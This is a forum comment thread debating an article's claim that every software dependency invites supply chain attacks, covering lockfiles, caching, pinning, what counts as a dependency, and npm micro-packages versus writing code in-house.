Every dependency you add is a supply chain attack waiting to happen
98 points by benhoyt
98 points by benhoyt
Correction: Every dependency you add is many supply chain attacks waiting to happen.
Very true! Both because of new ones potentially cropping up over time, and because they may each have indirect dependencies.
While you're here, I really appreciate your article Our Software Dependency Problem. I've shared it many times at work. Thanks!
"Potential" is not the same as "waiting to happen". We don't have infinite time, and certainly not infinite monkeys with typewriters. All risk has to be weighed by the likelihood of its triggering circumstances to happen; if you run a trojan in an airgapped environment, is it really a liability ?
No matter who I talk to this approach is always an unpopular stance. It's rather unfortunate that it is too.
The problem is made worse by the practice of "don't cache, but instead download all dependencies on every build".
This means that any dependency attack is immediately spread to tens, if not hundreds of thousands of machines.
I don’t follow. Not caching might be laziness, or using inflexible build tools, but ultimately very few supply chain attacks are the result of an existing package release being replaced by a compromised version.
Instead it’s generally the maintainer accesses being stolen and a new, compromised, version being released.
Perhaps I’m wrong in assuming every stack uses lockfiles, but merely failing to cache or vendor your dependencies shouldn’t result in being pwned.
Also many lockfiles now contain digest of the originally downloaded package, which ensure tha further downloads use the exact same artifact, byte for byte.
It's a prisoner's dilemma. One organisation might advance their security posture by not being the first mover and waiting for everybody else to hit the vulnerabilities first. But if everybody waits a month before updating something, we'r back to square one because nobody is testing early - except now legitimate patches take longer to propagate, which is a strictly worse situation for all.
Actually, people are testing early–security researchers. They are highly incentivized to find and stop supply chain attacks to sell their products.
My issue was more that automated, and unthinking updates are likely bad. It shows a fundamental failure of process.
"What version of foo.js do we need? I dunno, let's just download the newest one every 10 minutes!"
That approach goes against decades of engineering practice.
Caching doesn't help. Caching is a technicality to store locally what is believed to be the very same blob that exists remotely. Caching only kicks in once you already pulled the dependency once.
What would mitigate the issue would be pinning dependencies to known specific stable builds that are known to work and be safe. I think you probably mean this.
Pinning is useful, too. I'm not recommending "one true magic solution" to solve all problems.
From a simple engineering point of view, it's insane to have dozens of employees download the same package dozens of times a day. Caching should be the bare minimum for engineering competetence.
Caching also allows you to lower the time frame where you might be vulnerable. If you're downloading a package once a day, you're less vulnerable than if you're downloading it every minute.
Caching also makes it easier to centralize pinning, along with any scanning of downloads.
This is the actual problem. A supply chain attack can only affect you if you're updating to latest constantly.
Software engineering, like life, is a balance of risk. You can minimize risk as much as possible at the expense of comfort and other things. What is the arbitrary line between too many dependencies and "let's build our X from scratch when Y exists"?
Exactly right and the real problem is that teams don't have these conversations because it's not a part of their engineering culture to in a reasonable way.
When you evaluated the dependency initially (and added its hash to your lockfile), you probably did your due diligence.
I think this is a long stretch in this day and age...
I personally have come to like the idea of cooldown periods — gives automated scanners a few days to find attacks. But in general, I think standing on the shoulders of giants lets smaller teams ship more ambitious projects.
While I know it wasn't the goal of the article, I'm going to use it to continue to justify my chronic case of NIH (Not Invented Here) syndrome.
I think it was the goal, no? And it's no bad thing. Diversity in a population breeds immunity and resilience. The world will be in a better and more predictable place if a consistent 1% of systems become vulnerable every month rather than there being a 1% chance of every system becoming vulnerable at the same time every month.
I don't think that was the goal at all in my reading of the article. The last line of the article makes it pretty clear “a little copying is better than a little dependency”. I took this to mean that instead of using a dependency, you can just have a copy, whether it is a whole library or just a specific function, and thus you won't be nearly as vulnerable to these sorts of attacks. My take was more like "Don't copy, write yourself ya lazy bum!" :)
Seems like a bad thing. Building your own for fun or learning is good. But multiple different bits of code which all achieve the same goal is inefficient. Maximum code reuse is the way
That seems like an unnecessarily binary way of thinking to me. Surely there's a happy medium?
Why? What practical benefit (again, excluding for fun and learning) would there be in building again something which has already been built and can be trivially copied or used?
This is perhaps directed by what my parents taught me during my upbringing, but there are parts where it's really nice to be independent in life. The most fundamental things most often, that you really, deeply care about—your house, for example—such that nothing but the strongest of forces can pull your life away from under your feet.
Likewise in code, there are certain fundamental aspects that I like to keep independent, so that nothing can pull the rug on me. In a video game, which is the thing I've spent most of my professional years making, that would be the game engine—I've heard multiple friends doing game dev as a hobby complain that breaking updates in Unity are a pain. I've also spent a few years working professionally with Unreal Engine, in a company cooperating closely with its developers, and my personal opinion is that it's an old tool which you can't always rely on—as well as, relying on Epic Games' developers to fix things feels exactly as good as having a landlord renting you a flat with a washing machine, and they're only ever willing to spend money on a basic, minimum washing machine that is loud and slow.
Depending on others necessarily means things may not go as you want them to, because those other people may have differing opinions on what's good, or differing time and money budgets that make them focus on things you are not exactly always interested in—while long standing problems remain unaddressed.
So, in my opinion, it's good to be independent with those fundamental things you spend the most time working with.
I understand though this is a philosophy among many, directed by my own life experiences, and it might not make sense to you if you haven't experienced something similar.
My first thought every time I see something like this is to ask: what counts as a dependency?
Even for Go, whose philosophy the author approvingly quotes, there's no such thing as a truly zero-dependency application. A "standalone" Go binary still needs a reasonably robust operating system to be able to run, and still needs at least the Go toolchain to build. Are those being counted among the dependencies? Even for an absolutely minimal Linux environment you're still pulling in huge amounts of third-party code that you haven't read, never will read, and which you don't fully control the update process for (if you pull a base Docker image, for example, you're getting whatever the distro decided to put in that particular tag, not what you chose). And all it takes is one briefly-undetected compromise of any one of the many, many sub-components of that distro to get you back in trouble (see: xz).
So as I see it, you have "dependencies" and the associated risks no matter what. No man is an island, says the poet, and neither is any of our code. Which means you can't ever let your guard down and pat yourself on the back for not having "dependencies"; you have to adopt the processes and safeguards to protect and mitigate against dependency compromise no matter what you're doing. At which point, you might as well take fuller advantage of other people's code and save yourself the time and trouble of trying to avoid or reproduce it.
Even for Go, whose philosophy the author approvingly quotes, there's no such thing as a truly zero-dependency application.
If you find yourself thinking "these people are discussing X, but if X is re-defined as Y then there's no such thing as X, therefore they don't understand the problem" then your thought process has gone off-track.
Discussions about dependencies in userspace programming are about third-party library dependencies, so they exclude functionality provided by the environment (kernel, libraries provided by the OS) and the language (standard library, possibly even extended stdlib such as golang.org/x/).
A zero-dependency codebase is therefore one that only uses OS and stdlib functionality, and doesn't require any third-party library code.
A "standalone" Go binary still needs a reasonably robust operating system to be able to run, and still needs at least the Go toolchain to build. Are those being counted among the dependencies?
No, because they're not third-party library dependencies. The stdlib, OS libc, OS kernel, CPU microcode, and the firmware in your home's circuit breaker are not part of the dependency stack from the point of view of a userspace developer.
Even for an absolutely minimal Linux environment you're still pulling in huge amounts of third-party code that you haven't read, never will read, and which you don't fully control the update process for
A minimal Linux environment is the kernel, which is not usually distributed with userspace application code. And if there was a security vulnerability in the Linux kernel then nobody would blame the applications running on it.
(if you pull a base Docker image, for example, you're getting whatever the distro decided to put in that particular tag, not what you chose).
People who care about minimizing dependencies aren't usually building with a distribution-based Docker base image. Either they use FROM scratch for an empty base and provide a statically-linked binary (common for Go and Rust), or they have a specific version of libc (etc) that they have qualified as part of their development process.
A zero-dependency codebase is therefore one that only uses OS and stdlib functionality, and doesn't require any third-party library code.
And yet it still relies on huge quantities of third-party code which can contain security vulnerabilities, or be compromised by attackers, and you still need to have processes in place to deal with those issues. There is no situation where trying to redefine "dependency" to exclude some of your dependencies gets you out of that.
And yet it still relies on huge quantities of third-party code which can contain security vulnerabilities, or be compromised by attackers, and you still need to have processes in place to deal with those issues.
What position are you arguing against? It's obviously not from the OP's link, or anywhere in this thread.
If you want to claim that Go binary compiled against only the Go standard library contains huge quantities of object code that did not originate from its own source code or the Go stdlib, then to be blunt I don't believe you. Prove it.
If you want to claim that a binary's entire runtime environment, including OS, should be counted as part of that binary's dependency graph for security response purposes then (1) you won't be able to convince that's a reasonable position, and (2) nobody who ships userland applications is going to take responsibility for auditing their OS kernel.
If you think people are claiming that eliminating dependencies means they don't need a defined procedure for security-critical bugs then you are misunderstanding them, because to do so would be to claim that first-party code is proven correct by mere construction.
There is no situation where trying to redefine "dependency" to exclude some of your dependencies gets you out of that.
Again, you're using a non-standard definition of "dependency" which is why you're confused about what other people are or are not claiming regarding the benefits of reducing dependencies.
The goal of reducing or eliminating dependencies (which, remember, are definitionally third-party code) is mitigation, and it's a highly effective one.
If you want to claim that Go binary compiled against only the Go standard library contains huge quantities of object code that did not originate from its own source code or the Go stdlib, then to be blunt I don't believe you. Prove it.
Where did GP claim this?
I think you are stuck on semantics, and are more concerned about classifying code executing in the context of an application as either "dependency" or "non-dependency". The GP seems more concerned with improving the security posture of the whole application, and their argument seems to be that the heuristic of "minimizing dependencies" is potentially dangerous.
I don't know whether I agree with GP, but I don't think you've even engaged with it fully yet.
Where did GP claim this?
In the post I replied to, in the part I quoted.
I think you are stuck on semantics, and are more concerned about classifying code executing in the context of an application as either "dependency" or "non-dependency".
No, I'm annoyed that yet again someone is using the "I see you talking about blueberry muffins, if I redefine 'blueberry' to mean a berry that is uniformly #0000FF then blueberries don't really exist, therefore you have never seen a blueberry muffin" pattern to shoehorn their own personal windmill-chasing into an unrelated discussion.
The GP seems more concerned with improving the security posture of the whole application, and their argument seems to be that the heuristic of "minimizing dependencies" is potentially dangerous.
The GP wants to change the definition of "dependency" to encompass all the code that needs to execute correctly to enable an application to execute as designed.
In that definition a Go binary compiled for macOS that prints "hello world" can't be said to be zero-dependency; it depends on libSystem.dylib, the kernel, the GPU firmware, the CPU microcode, and everything else in the stack of abstractions that is a modern computer.
He argues that if this is the definition of a "dependency" then no userspace software can be said to be truly "zero-dependency". Then he extends that argument to say that with the millions and millions of unaudited LoC required just to print "hello world" it's unreasonable to ascribe security issues to the use of third-party library code.
The argument against this is, basically, that when people say "dependency" they don't mean the OS or kernel or firmware. They mean third-party library code. That's the entire scope of the discussion. It's an argument about left-pad and its allies.
The actual reason people put forward to minimize dependencies is that each one represents a distinct path by which unreviewed code can become incorporated into your program's build artifact. The value a dependency provides vs open-coding its equivalent needs to be balanced against the security risk and maintenance cost inherent in depending on it.
I don't know whether I agree with GP, but I don't think you've even engaged with it fully yet.
Whatever he's arguing doesn't need to be thought about because it has nothing to do with the actual topic at hand.
Whatever he's arguing doesn't need to be thought about because it has nothing to do with the actual topic at hand.
I think this is where the disagreement really begins and ends, so I won't reply to each point.
I will, however, selfishly indulge in a final hypothetical to try to convey why I think you are wrong to narrow the focus of discussion this way:
If a homeowner were to post to their homeowner blog saying:
In my essay “The old home is beautiful”, I discussed how using fewer appliances makes your home more nostalgic. But it also makes it safer.
As we’ve seen recently, appliances can and do start fires. We saw this on a grand scale with the faulty Mr. Heater units during the last blizzard, and we’ve seen it more recently with the Ninja Creami incident and with power strips being compromised (which was actually caused by the Ninja Creami).
The interesting thing about the Ninja Creami is that it’s not even an essential appliance; it’s a gimmick appliance. But a fault in a gimmick appliance can still burn your house down.
The careful reader may note that my title is not quite accurate. It’s not every appliance you install that’s a problem; it’s every dependency you run. When you bought the appliance initially, you probably did your due diligence. But appliances can break down over time, and you probably don't check them for safety as often as you need to.
You should probably throw out your appliances. In my experience, we get more problems from them than we get benefit.
So, please think twice, or thrice, before adding a new appliance to your home. As the luddite proverb says, “a little discomfort and extra effort is better than a little appliance”.
Then, someone comments to the effect of:
My first thought every time I see something like this is to ask: what counts as a fire-risk worth eliminating?
Even for luddites, whose philosophy the author approvingly quotes, there's no such thing as a truly fire-risk free home. A "fire-risk free" home still needs to be heated, and still exists in a world full of flammable trees, neighboring homes, and arsonists. Are those being counted among the fire risks? ...
So as I see it, you have fire-risk no matter what. No man is an island, says the poet, and neither are any of our homes. Which means you can't ever let your guard down and pat yourself on the back for not having appliances; you have to adopt the processes and safeguards to protect and mitigate against fire no matter what you're doing. At which point, you might as well take fuller advantage of useful appliances and save yourself the time and trouble of trying to avoid them.
And you then object, because the discussion was about appliances, and this comment is so off-topic and tries to redefine a term (which it never does, it rhetorically talks about "dependencies" (note the quotes from the original comment) to try to argue that the very definition you want to cling to is not terribly useful in this context, but I digress). In my reproduction I use different terms ("appliances" and "fire-risk") for the related-but-distinct concepts you object to rhetorically conflating, which hopefully helps?
If your position is just "this is about a heuristic for a subset of the third-party code that poses a security risk, and I don't care about broadening the discussion" that's perfectly fine, but no need to pretend the commenter's "thought process has gone off-track."
If I were a refrigerator designer talking on a forum for the appliance manufacturing industry, on a thread about the tradeoffs between purchasing components off-the-shelf vs designing them in-house, I would absolutely be annoyed at someone coming in to say:
Like, I don't even care whether any of those are true or not -- before getting to the question of truth, the matter of topicality applies.
If your position is just "this is about a heuristic for a subset of the third-party code that poses a security risk, and I don't care about broadening the discussion" that's perfectly fine, but no need to pretend the commenter's "thought process has gone off-track."
I'm not "pretending" to think that, I actually do think that.
The original comment is not off-topic at all. You directly moved the conversation off-topic, by taking an on-topic comment and arguing semantics rather than engaging substantively. The very first sentence in your first reply is ad hominem, and misses the commenter's point entirely.
but also the customer's house wiring and whether they can pay their electric bill and whether they might be in a high-winds area prone to power outages
I don't get the electric bill or outage parts, since we care about safety/security, not whether something works at all.
To the wiring bit, I think appliance designers definitely do (or should) consider many things outside of the physical materials and components in the appliance itself, especially when safety is the goal. I googled a random user manual for a space heater and see:
You can say this is all liability boilerplate, and that the manufacturer really doesn't care, but I'm still certain they want to avoid the lawsuit to begin with. They are designing around environmental factors outside of their immediate control wherever they reasonably can.
Modern appliances have many features which directly interact with the environment, and often guard against faulty wiring/faults in things outside of the appliance itself. Things like surge protection, fuses, polarized plugs, bonded exposed metal and grounding through the plug, etc.
So no, I wouldn't expect anyone working on appliances to be annoyed if someone pointed this out in a discussion where someone is arguing anything approaching "do everything yourself whenever you can, that's how you make the thing safe."
"There are many possible causes of a house fire besides appliances, such as forest fires, so theres no point in reviewing the fire safety properties of individual components or taking special care to design critical components in-house"
The original comment says: "Which means you can't ever let your guard down and pat yourself on the back for not having "dependencies"; you have to adopt the processes and safeguards to protect and mitigate against dependency compromise no matter what you're doing."
In my reading, this advocates for the exact opposite of your mis-characterization of it.
"The only reason manufacturers would choose to do everything in house is because they don't want to offer a warranty program"
Is it really so crazy to read this into an article advocating for everyone to aggressively embrace NIH to improve security? The article does not pair the advice with anything about writing secure software, auditing software for security, etc. so the implication is that purely the act of avoiding dependencies is security-positive, which the original comment calls into question. Why is that annoying?
the implication is that purely the act of avoiding dependencies is security-positive, which the original comment calls into question. Why is that annoying?
Because that's not what the article claims.
Any code has a risk of containing bugs that introduce security vulnerabilities. Let code written in-house have risk H, third-party dependencies have risk R. Third-party dependencies come with an additional risk S of a future update containing newly-introduced vulnerabilities. Note that H and R scale with lines of code, but S is independent of LoC.
It's very common for developers to operate under the assumption that third-party code is better than they can write themselves and that it is safe to update dependencies automatically, i.e. H > R and S = 0. This leads to a development methodology that encourages using hundreds or thousands of small libraries for functionality that would have traditionally been written as part of the application itself.
This article is arguing that S > 0 and S > (R - H) for small H, in other words it claims third-party code with automatic updates is not risk-free and it claims that for small LoC the risk of supply-chain compromise outweighs any possible benefit from using third-party code.
A claim that "avoiding dependencies is security-positive" is R > H which would be much more extreme, and would lead to something like stage0 which tries to bootstrap a trusted environment from manually-verified machine code, or uxn which is a small VM that can run bare-metal on home-built hardware.
Because that's not what the article claims.
Ah, so you can read in good-faith and fill in the blanks when something isn't explicit! You just refuse to do it when something annoys you.
I agree, I over-simplified the article. Thank you for explaining. I think you did a great job expanding the article into a framework to discuss the merits of the heuristic.
Now please respond to some of the other points I just made, or I'm not interested in continuing. I responded originally because you were being rude and ostensibly responding in bad faith, and I really only want to talk about that.
Here, respond to just one other thing I said:
The original comment is not off-topic at all. You directly moved the conversation off-topic, by taking an on-topic comment and arguing semantics rather than engaging substantively. The very first sentence in your first reply is ad hominem, and misses the commenter's point entirely.
Every one of my replies here has been made in full good faith.
and fill in the blanks when something isn't explicit! [...] I agree, I over-simplified the article. Thank you for explaining. I think you did a great job expanding the article into a framework to discuss the merits of the heuristic.
I did not fill in any blanks in the article or try to expand on it. What I wrote was literally just the content of the article, condensed into a few sentences.
You want me to respond point by point? Ok.
The original comment is not off-topic at all. You directly moved the conversation off-topic, by taking an on-topic comment and arguing semantics rather than engaging substantively.
The original topic was off-topic because the topic is third-party dependencies, and the comment was about the program's runtime environment, which is not part of a program's dependency set.
The very first sentence in your first reply is ad hominem, and misses the commenter's point entirely.
I did not miss the commenter's point, I understand it and know what aspect of modern programming he is referring to, which is that userspace programs place complex requirements on their runtime environment and therefore require the correct functioning of large amounts of third-party code to function as designed.
I don't think that topic (extensive runtime environment requirements) has anything with the topic of the article (large dependency sets).
but also the customer's house wiring and whether they can pay their electric bill and whether they might be in a high-winds area prone to power outages
I don't get the electric bill or outage parts, since we care about safety/security, not whether something works at all.
Whether a refrigerator functions depends on whether an electic supply is available, similar to how whether a userspace program functions depends on the correct behavior of its runtime environment (e.g. the kernel and system libraries).
To the wiring bit, I think appliance designers definitely do (or should) consider many things outside of the physical materials and components in the appliance itself, especially when safety is the goal. I googled a random user manual for a space heater and see:
[...]
You can say this is all liability boilerplate, and that the manufacturer really doesn't care, but I'm still certain they want to avoid the lawsuit to begin with. They are designing around environmental factors outside of their immediate control wherever they reasonably can.
All of those are regarding the appliance itself. There is no liability attached to a manufacturer for things outside of their control, such as forest fires.
In the analogy of software programs to appliances the electric supply is equivalent to the runtime environment the program is designed to operate in. For example a program compiled for Linux might expect a certain version of the Linux kernel ABI to be present and functional.
The exact details of how that runtime environment is supplied to the program are irrelevant to the program, just as the details of the electric grid are irrelevant to the refrigerator. A program compiled for the Linux kernel might (or might not) also run under FreeBSD (using the Linux ABI emulation), or gVisor (a userspace implementation of the Linux kernel ABI), or a customer-modified build of the Linux kernel that adds/removes/modifies some syscalls.
If someone runs a Linux program under a modified Linux kernel and those modifications cause that instance of the program to be insecure (e.g. because the modified kernel has non-standard mmap behavior) then that is not the responsibility of the program to guard against. It is unreasonable to expect programmers to write code under the assumption that they are responsible for the entire runtime environment to the same extent that they are responsible for the behavior of the program.
Modern appliances have many features which directly interact with the environment, and often guard against faulty wiring/faults in things outside of the appliance itself. Things like surge protection, fuses, polarized plugs, bonded exposed metal and grounding through the plug, etc.
Those are all functionalities of the appliance. A program might also contain functionality intended to guard against misuse and/or assert properties of the environment in which it is being run -- for example it might require secure-boot from a known-trusted root key to verify the OS and hardware belongs to an enumerated set of known-good configurations. Whether this checking exists or not does not imply that the entire runtime environment becomes part of the program's dependency set.
So no, I wouldn't expect anyone working on appliances to be annoyed if someone pointed this out in a discussion where someone is arguing anything approaching "do everything yourself whenever you can, that's how you make the thing safe."
For the runtime environment to be considered part of the program's dependency set is equivalent to an appliance manufacturer considering the customer's electric supply to be part of their refrigerator. No matter how much a manufacturer might take precautions to harden their appliance against unforseen inputs (e.g. voltage spikes or brownouts), they are not responsible for the customer's electric supply physically being disconnected.
"There are many possible causes of a house fire besides appliances, such as forest fires, so theres no point in reviewing the fire safety properties of individual components or taking special care to design critical components in-house"
The original comment says: "Which means you can't ever let your guard down and pat yourself on the back for not having "dependencies"; you have to adopt the processes and safeguards to protect and mitigate against dependency compromise no matter what you're doing."
The original comment says "So as I see it, you have "dependencies" and the associated risks no matter what. [...] you might as well take fuller advantage of other people's code and save yourself the time and trouble of trying to avoid or reproduce it.".
This is a worldview in which a program is in a binary state of either depending on the correct behavior of any third-party code or not.
The set of programs that does not depend on any third-party code is too small and specialized to be relevant to the discussion (e.g. space probe firmware), therefore the categories as defined by the top-level comment collapse into a statement that all userspace programs depend on a complex runtime environment and therefore the presence or absence of third-party code in the program's dependency set does not materially affect its security profile.
The part you quoted reflects the author's belief that people advocating for the reduction of third-party dependencies view a state of zero dependencies as equivalent to a state of zero security vulnerabilities. In other words, he believes that those "processes and safeguards" only exist because of the presence of third-party code in the program's dependency set.
However, the "processes and safeguards" he describes exist regardless of whether a program has dependencies or not, because first-party code authored by the developers of the program also has a non-zero risk of security vulnerabilities. To claim that a zero-dependency codebase does not require security-related "processes and safeguards" is to claim that first-party code definitionally cannot contain security vulnerabilities. This position is not common (indeed I have never heard of anyone advocating it), therefore the characterization of people advocating for reduction in dependency sets is attacking a straw man.
In my reading, this advocates for the exact opposite of your mis-characterization of it.
Per the discussion, your interpretation of his comment is different from mine.
"The only reason manufacturers would choose to do everything in house is because they don't want to offer a warranty program"
Is it really so crazy to read this into an article advocating for everyone to aggressively embrace NIH to improve security? The article does not pair the advice with anything about writing secure software, auditing software for security, etc. so the implication is that purely the act of avoiding dependencies is security-positive, which the original comment calls into question. Why is that annoying?
The original article identifies a specific source of security risk (supply-chain attacks) that is specific to third-party dependencies, notes that this security risk scales with the number of unique third-party dependencies, and recommends that the number of distinct third-party dependencies be viewed as a goal for reduction for the purposes of mitigating the identified security risk.
It advocates for viewing each third-party dependency as adding a non-zero amount of security risk to the program via the possibility of introduced novel vulnerabilities in future updates to those dependencies.
I don't see anything incorrect in any of those statements.
The article does not "aggressively embrace NIH" -- I don't see anything in it that says third-party dependencies must be avoided.
If you look at ecosystems that broadly follow the article's advice you will notice that they usually have dependencies that provide significant amounts of functionality (e.g. a media codec or GUI framework). In contrast, ecosystems that do not follow the article's advice (i.e. they encourage use of third-party dependencies as preferential to self-written code) often prominently feature libraries that contain only a single piece of functionality that could be written by a typical programmer in a few minutes.
To take the examples of JavaScript and Go, a programmer working in JavaScript might use the object-assign package (99 million weekly downloads, version v4.1.1) to merge the properties of two JavaScript objects. A programmer working in Go would probably just write a function and include it in a per-project util.go somewhere.
Other JavaScript libraries that offer similar functionality include extend (56 million weekly downloads, v3.0.2) and object.assign (63 million weekly downloads, v4.1.7).
It is correct to note that the security risk introduced by depending on large numbers of small libraries maintained by individuals with unknown security postures (maybe they develop everything in Qubes, maybe they develop on the same machine they torrent pirated games on) is non-zero. The article's conclusion that adding new dependencies should be viewed as non-zero risk seems reasonable to me.
I did not fill in any blanks in the article or try to expand on it. What I wrote was literally just the content of the article, condensed into a few sentences.
You "condensed" a ~213 word article into ~214 words. I guess maybe you mean that all of the setup and context for the paragraph which starts "This article is arguing that..." doesn't count?
I disagree. You rewrote the article, with about the same number of words, and with many implicit aspects made explicit. That is not the same content.
The original topic was off-topic because the topic is third-party dependencies, and the comment was about the program's runtime environment, which is not part of a program's dependency set.
The original topic was security, of which third-party dependencies form a component.
I did not miss the commenter's point, I understand it and know what aspect of modern programming he is referring to, which is that userspace programs place complex requirements on their runtime environment and therefore require the correct functioning of large amounts of third-party code to function as designed.
I don't think that topic (extensive runtime environment requirements) has anything with the topic of the article (large dependency sets).
It seems like you still don't understand. The discussion is about security, and the original comment is on-topic.
Whether a refrigerator functions depends on whether an electic supply is available, similar to how whether a userspace program functions depends on the correct behavior of its runtime environment (e.g. the kernel and system libraries).
The topic is security, not whether the thing functions at all. That's why I am confused.
All of those are regarding the appliance itself. There is no liability attached to a manufacturer for things outside of their control, such as forest fires.
The topic is not about liability, blame, etc.
The topic is security, and only the security of the whole system actually matters.
However, as ubernostrum points out in another comment, there are situations like SaaS where those things very expressly are under your control.
If someone runs a Linux program under a modified Linux kernel and those modifications cause that instance of the program to be insecure (e.g. because the modified kernel has non-standard mmap behavior) then that is not the responsibility of the program to guard against. It is unreasonable to expect programmers to write code under the assumption that they are responsible for the entire runtime environment to the same extent that they are responsible for the behavior of the program.
In the SaaS context it is unreasonable to limit discussion of security to "library dependencies."
Those are all functionalities of the appliance. A program might also contain functionality intended to guard against misuse and/or assert properties of the environment in which it is being run -- for example it might require secure-boot from a known-trusted root key to verify the OS and hardware belongs to an enumerated set of known-good configurations. Whether this checking exists or not does not imply that the entire runtime environment becomes part of the program's dependency set.
There are still cases like SaaS where the focus on "dependency set" is not useful.
For the runtime environment to be considered part of the program's dependency set is equivalent to an appliance manufacturer considering the customer's electric supply to be part of their refrigerator. No matter how much a manufacturer might take precautions to harden their appliance against unforseen inputs (e.g. voltage spikes or brownouts), they are not responsible for the customer's electric supply physically being disconnected.
If someone owns the power supply and built the fridge, then yes, it is their responsibility.
The original comment says "So as I see it, you have "dependencies" and the associated risks no matter what. [...] you might as well take fuller advantage of other people's code and save yourself the time and trouble of trying to avoid or reproduce it.". ... The part you quoted reflects the author's belief that people advocating for the reduction of third-party dependencies view a state of zero dependencies as equivalent to a state of zero security vulnerabilities. In other words, he believes that those "processes and safeguards" only exist because of the presence of third-party code in the program's dependency set.
No, it reflects that "you might as well take fuller advantage of other people's code" if that's true. It is in the bit you just quoted to me. This is the sort of thing I mean when I say you don't seem to post in "good faith": you read the best interpretation of the original article, and the worst interpretation of the comment you replied to. Try reading the best in both, and clarify things when you are not sure. Or at the very least don't start with a personal attack. You make it very hard to read the best into your reply when it starts like that.
The article does not "aggressively embrace NIH" -- I don't see anything in it that says third-party dependencies must be avoided.
I'm being hyperbolic again, my bad. I agree the article doesn't go this far.
To take the examples of JavaScript and Go, a programmer working in JavaScript might use the object-assign package (99 million weekly downloads, version v4.1.1) to merge the properties of two JavaScript objects. A programmer working in Go would probably just write a function and include it in a per-project util.go somewhere.
I actually think this is a great example of why libraries are so useful, and why ubernostrum's comment is not off-topic.
The object-assign package has three non-obvious checks to workaround faulty runtime behavior. I'm sure one can contrive a scenario where one or all of these bugs could enable an exploit.
If the Go developer just made something that "works for me", they would be reimplementing these fixes themselves after the bug reports roll in. Multiply that by everyone who "just wrote a function" and there is a whole ecosystem of slightly incompatible, broken implementations.
We are just arguing Greenspun's tenth rule, and you're trying to shut down the discussion because "we weren't talking about common lisp."
The original article does not mention the many security benefits of using libraries in many cases (no matter how much you would like to read them into it, as if it was "literally" there). That's fine, it is about the length of a tweet, but what isn't fine is cutting off the discussion artificially based on what you personally like and dislike.
I think that if, say, I deploy a web application as a Docker container to a Kubernetes cluster, then the distro flavor of the container, along with Kubernetes and all its associated bits, become part of my application's dependencies and I have to account for the fact that they will need attention, sometimes urgently (as when a security issue is discovered).
Therefore I push back on people who seem to suggest that only things which come from a language package manager, and/or which are linked (statically or dynamically) by a compiled application binary, count as "dependencies".
The goal of reducing or eliminating dependencies (which, remember, are definitionally third-party code) is mitigation, and it's a highly effective one.
It's strange to me that you say this when the rest of your comment is arguing that you can take on hundreds of thousands and potentially millions of lines of third-party code without calling it "dependencies".
All of that code A) is still code and B) is still third-party and C) can still hurt you.
All of that code A) is still code and B) is still third-party and C) can still hurt you.
Doesn't matter. It's not code that I have any control over, I can't prevent someone from running my code in environments I don't control, so I'm not responsible for any security issues that might arise from it.
If I ship an application and Gallant runs it on seL4 while Goofus runs it on a 10-year old version of HackMyLinux running unsecured telnet as root, my role in the outcome is identical.
The set of code that might run under my own is unbounded -- maybe it's running bare-metal on a CPU soldered together from discrete components, maybe it's in a macOS -> Parallels -> Windows -> VMware -> Linux -> QEMU -> Haiku -> DOSBox stack and there are tens of thousands of individuals whose code affects whether mine functions correctly.
Doesn't matter, my responsibility is the same and it includes dependencies but not the user-provided runtime environment.
I can't prevent someone from running my code in environments I don't control, so I'm not responsible for any security issues that might arise from it.
I write applications, primarily networked services, which are deployed and run internally at my employer, and which depend on the existence of an operating system and its various standard tools and libraries to be able to run. If a vulnerability exists in any part of that huge pile of third-party code upon which my applications depend for their ability to run, I do not have the luxury of shrugging and disclaiming any responsibility for doing something about it. I have to treat the operating system and quite a lot else as part of the surface area of my "dependencies".
And my situation is not unique. Many, many other developers are in the same situation.
However, one thing that is not my problem or my responsibility is overcoming your seeming unwillingness or inability to understand that many people are in this situation, and therefore are not only justified but correct in counting many things, including the operating system, as part of their dependencies even though you personally may be in a situation where you feel they are not part of your dependencies. So I am done with responding to you.
At which point, you might as well take fuller advantage of other people's code and save yourself the time and trouble of trying to avoid or reproduce it.
What about the cases when that code actually costs more time and causes more trouble?
What about the cases when that code actually costs more time and causes more trouble?
More trouble than what?
Suppose that another xz-type incident happens tomorrow, meaning a compromise of a program that's part of the base operating system many people rely on, rather than a compromise of a language-specific library. Who will be better off in quickly moving to deal with that incident?
There simply is no realistic way to have zero third-party dependencies, and no realistic way to have zero problems related to third-party dependencies. Since you're going to have dependencies anyway, and you're going to have problems related to them anyway, the right thing to do is acknowledge that and build processes to handle that reality. And once you have processes which equip you to handle the fact that you have dependencies and will have problems related to them, they pose less trouble and cost you less to handle.
There simply is no realistic way to have zero third-party dependencies, and no realistic way to have zero problems related to third-party dependencies.
But zero is not really the goal. Getting rid of unnecessary dependencies is the goal, or dependencies of which you only use a tiny fraction of the surface area.
Getting rid of unnecessary dependencies is the goal, or dependencies of which you only use a tiny fraction of the surface area.
How do you know which ones truly are "unnecessary"?
If it's "unnecessary" because you could rewrite it yourself, you've just given yourself more code to review and maintain, and more surface area for bugs and vulnerabilities; are you accounting for the trouble and cost that brings to you? Are you accounting for the time that will be taken away from working on the actual thing you intended to build?
And if a dependency is "unnecessary" because you only use a tiny fraction of it, that's an argument for the JavaScript/npm style of ecosystem. If a package only exports a single function, you either use it or you don't, no unnecessary surface area is possible! Yet somehow I don't think you actually intend to be arguing for that.
How do you know which ones truly are "unnecessary"?
That's not going to be a particularly satisfying answer but I would say experience helps you with that, and just generally shifting your mind away from the idea that "everything is hard".
And if a dependency is "unnecessary" because you only use a tiny fraction of it, that's an argument for the JavaScript/npm style of ecosystem. If a package only exports a single function, you either use it or you don't, no unnecessary surface area is possible! Yet somehow I don't think you actually intend to be arguing for that.
That is never an argument in favor of this because of the inherent risks small dependencies bring which are disproportional to the complexity of writing that function, or have an agent write that function. I wrote about that problem years ago and I think that post aged very well.
That is never an argument in favor of this because of the inherent risks small dependencies bring which are disproportional to the complexity of writing that function, or have an agent write that function.
It feels like now you're moving the goalposts; first you said "zero is not really the goal", but you've rejected the idea of dependencies which might include code you don't use, and now are rejecting the idea of dependencies which don't. The only way I can interpret this is that it's not an argument for, as you initially said, trying to eliminate "unnecessary" dependencies, but rather for trying to never have any dependencies at all.
And I don't think you can actually pull that off, for reasons I've already covered. No matter what claims someone might make about not having dependencies, they are almost certain to be relying on third-party code that they don't control and could at any point suffer a compromise or other major issue. The people who manage to deal most successfully with those incidents are the ones who face reality and admit that they really do have dependencies and really do need to acknowledge that and build process around it.
I think you are seeing the world a lot more black and white than me. The goal for me is to err on the side of fewer, and more established dependencies where the cost/benefit analysis looks better and I have encouraged other engineers over the years to do the same.
